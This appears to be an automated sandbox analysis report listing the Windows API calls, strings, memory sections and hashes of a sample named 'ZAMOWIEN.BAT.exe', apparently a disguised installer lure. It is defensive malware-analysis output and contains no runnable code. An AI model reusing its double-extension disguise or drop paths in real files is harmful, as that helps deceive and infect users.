                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CD5
                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404CE8
                                                                                  • SetWindowLongW.USER32(?,000000FC,00405260), ref: 00404D01
                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D15
                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D27
                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404D3D
                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D49
                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D5B
                                                                                  • DeleteObject.GDI32(00000000), ref: 00404D5E
                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D89
                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D95
                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2B
                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E56
                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E6A
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404E99
                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA7
                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404EB8
                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FB5
                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040501A
                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040502F
                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405053
                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405073
                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00405088
                                                                                  • GlobalFree.KERNEL32(?), ref: 00405098
                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405111
                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 004051BA
                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C9
                                                                                  • InvalidateRect.USER32(?,00000000,?), ref: 004051E9
                                                                                  • ShowWindow.USER32(?,00000000), ref: 00405237
                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405242
                                                                                  • ShowWindow.USER32(00000000), ref: 00405249
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                  • String ID: $M$N
                                                                                  • API String ID: 1638840714-813528018
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040473B
                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404765
                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404816
                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404821
                                                                                  • lstrcmpiW.KERNEL32(Call,004236E8,00000000,?,?), ref: 00404853
                                                                                  • lstrcatW.KERNEL32(?,Call), ref: 0040485F
                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404871
                                                                                    • Part of subcall function 004058CE: GetDlgItemTextW.USER32(?,?,00000400,004048A8), ref: 004058E1
                                                                                    • Part of subcall function 00406518: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00403334,C:\Users\user\AppData\Local\Temp\,764A3420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                                                    • Part of subcall function 00406518: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                                                    • Part of subcall function 00406518: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00403334,C:\Users\user\AppData\Local\Temp\,764A3420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                                                    • Part of subcall function 00406518: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00403334,C:\Users\user\AppData\Local\Temp\,764A3420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                  • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,?,004216B8,?,?,000003FB,?), ref: 00404934
                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040494F
                                                                                    • Part of subcall function 00404AA8: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                                                    • Part of subcall function 00404AA8: wsprintfW.USER32 ref: 00404B52
                                                                                    • Part of subcall function 00404AA8: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                  • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$Call$6B
                                                                                  • API String ID: 2624150263-2747099026
                                                                                  APIs
                                                                                    • Part of subcall function 7050121B: GlobalAlloc.KERNEL32(00000040,?,7050123B,?,705012DF,00000019,705011BE,-000000A0), ref: 70501225
                                                                                  • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 70501C6F
                                                                                  • lstrcpyW.KERNEL32(00000008,?), ref: 70501CB7
                                                                                  • lstrcpyW.KERNEL32(00000808,?), ref: 70501CC1
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 70501CD4
                                                                                  • GlobalFree.KERNEL32(?), ref: 70501DB6
                                                                                  • GlobalFree.KERNEL32(?), ref: 70501DBB
                                                                                  • GlobalFree.KERNEL32(?), ref: 70501DC0
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 70501FAA
                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 70502144
                                                                                  • GetModuleHandleW.KERNEL32(00000008), ref: 705021B9
                                                                                  • LoadLibraryW.KERNEL32(00000008), ref: 705021CA
                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 70502224
                                                                                  • lstrlenW.KERNEL32(00000808), ref: 7050223E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33351315934.0000000070501000.00000020.00000001.01000000.00000006.sdmp, Offset: 70500000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33351257625.0000000070500000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000000.00000002.33351412590.0000000070503000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000000.00000002.33351485317.0000000070505000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70500000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 245916457-0
                                                                                  • Opcode ID: 687b68fa4681c8dcf21e9f7f9f41e8b500300d6f5797c58174b4c1df23a333b1
                                                                                  • Instruction ID: ffede7ec748ab8927ff91f1efdec1049ddda92feaf2e663774c2631d2ad37bea
                                                                                  • Opcode Fuzzy Hash: 687b68fa4681c8dcf21e9f7f9f41e8b500300d6f5797c58174b4c1df23a333b1
                                                                                  • Instruction Fuzzy Hash: C5229C76D0020ADEDB119FB4C9846EEBFB9FB04305F20492ED197E7280E7749A81DB56
                                                                                  APIs
                                                                                  • CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                  Strings
                                                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness, xrefs: 004021C3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateInstance
                                                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness
                                                                                  • API String ID: 542301482-3308940007
                                                                                  • Opcode ID: 5e736e3766f6f2c84d9b8d1786969cf60f007173139c094a39c5795cedf387ff
                                                                                  • Instruction ID: 3f6190fb0288cb4cc2191ecfdaddaa4006c381b8c0a92558cc12242fdf246284
                                                                                  • Opcode Fuzzy Hash: 5e736e3766f6f2c84d9b8d1786969cf60f007173139c094a39c5795cedf387ff
                                                                                  • Instruction Fuzzy Hash: C9414B71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB54
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFindFirst
                                                                                  • String ID:
                                                                                  • API String ID: 1974802433-0
                                                                                  • Opcode ID: 48d5054ae9fa3c66534243b530be4ac77275d228a2fdf316ae35e55088bcbc9e
                                                                                  • Instruction ID: 42b58e9376e2aae4a6b7d1f769ff68ee5b2b2e9610aeafae56754381977d23d8
                                                                                  • Opcode Fuzzy Hash: 48d5054ae9fa3c66534243b530be4ac77275d228a2fdf316ae35e55088bcbc9e
                                                                                  • Instruction Fuzzy Hash: FCF08271A14104EFDB10EBA4DE499AEB378EF04314F6045BBF505F21E1DBB45D419B2A
                                                                                  APIs
                                                                                  • CheckDlgButton.USER32(?,-0000040A,?), ref: 00404458
                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040446C
                                                                                  • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404489
                                                                                  • GetSysColor.USER32(?), ref: 0040449A
                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A8
                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B6
                                                                                  • lstrlenW.KERNEL32(?), ref: 004044BB
                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C8
                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044DD
                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404536
                                                                                  • SendMessageW.USER32(00000000), ref: 0040453D
                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404568
                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045AB
                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004045B9
                                                                                  • SetCursor.USER32(00000000), ref: 004045BC
                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004045D5
                                                                                  • SetCursor.USER32(00000000), ref: 004045D8
                                                                                  • SendMessageW.USER32(00000111,?,00000000), ref: 00404607
                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404619
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                  • String ID: 1C@$Call$N
                                                                                  • API String ID: 3103080414-3974410273
                                                                                  • Opcode ID: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                                                                  • Instruction ID: 9026ebbe03bb6d5dcd5a9bde039089338ffc2a6a86adc40c9d49ddbc6b033b78
                                                                                  • Opcode Fuzzy Hash: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                                                                  • Instruction Fuzzy Hash: D161A3B1A00209BFDB109F60DD45EAA7B79FB94305F00853AF705B62E0D779A952CF68
                                                                                  APIs
                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                  • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                  • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                  • String ID: F
                                                                                  • API String ID: 941294808-1304234792
                                                                                  • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                                  • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                                                                  • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                                  • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                                                                  APIs
                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,0040606B,?,?), ref: 00405F0B
                                                                                  • GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405F14
                                                                                    • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                                    • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                                  • GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405F31
                                                                                  • wsprintfA.USER32 ref: 00405F4F
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F8A
                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F99
                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD1
                                                                                  • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406027
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00406038
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603F
                                                                                    • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                                    • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                  • String ID: %ls=%ls$[Rename]
                                                                                  • API String ID: 2171350718-461813615
                                                                                  • Opcode ID: 452d6bb901878c0c7833dd9b0da621d42dccc5e8693507b5b61e49e3263f6faa
                                                                                  • Instruction ID: cb5629e100ec4411e7767e9ff1715c79388972a83a2f5f57e92a2ee479f5e204
                                                                                  • Opcode Fuzzy Hash: 452d6bb901878c0c7833dd9b0da621d42dccc5e8693507b5b61e49e3263f6faa
                                                                                  • Instruction Fuzzy Hash: 92313571240B19BBD230AB659D48F6B3A5CEF45744F15003BF906F72D2EA7C98118ABD
                                                                                  APIs
                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00403334,C:\Users\user\AppData\Local\Temp\,764A3420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                                                  • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                                                  • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00403334,C:\Users\user\AppData\Local\Temp\,764A3420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                                                  • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00403334,C:\Users\user\AppData\Local\Temp\,764A3420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Char$Next$Prev
                                                                                  • String ID: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                  • API String ID: 589700163-112748494
                                                                                  • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                  • Instruction ID: 9d8e3f8f3784457604ea521ff392e3c8e3efc90107dbe880bee10e7696629eb6
                                                                                  • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                  • Instruction Fuzzy Hash: AB11B655800616A5DB303B18BC44A7762F8AF54B60F92403FED89736C5F77C5C9286BD
                                                                                  APIs
                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0040427F
                                                                                  • GetSysColor.USER32(00000000), ref: 004042BD
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 004042C9
                                                                                  • SetBkMode.GDI32(?,?), ref: 004042D5
                                                                                  • GetSysColor.USER32(?), ref: 004042E8
                                                                                  • SetBkColor.GDI32(?,?), ref: 004042F8
                                                                                  • DeleteObject.GDI32(?), ref: 00404312
                                                                                  • CreateBrushIndirect.GDI32(?), ref: 0040431C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2320649405-0
                                                                                  • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                  • Instruction ID: 0f30b588a8d7f9bbf1461c481b53b443173021fc121084549064eaca6d41b1d8
                                                                                  • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                  • Instruction Fuzzy Hash: CD2174716007059FCB319F68DE48A5BBBF8AF81711B048A3EFD96A26E0D734D944CB54
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BD1
                                                                                  • GetMessagePos.USER32 ref: 00404BD9
                                                                                  • ScreenToClient.USER32(?,?), ref: 00404BF3
                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C05
                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C2B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$Send$ClientScreen
                                                                                  • String ID: f
                                                                                  • API String ID: 41195575-1993550816
                                                                                  • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                  • Instruction ID: ae0188e128420319643ad50796f74bd77cac7447aa244d18a8bf097087cf05ab
                                                                                  • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
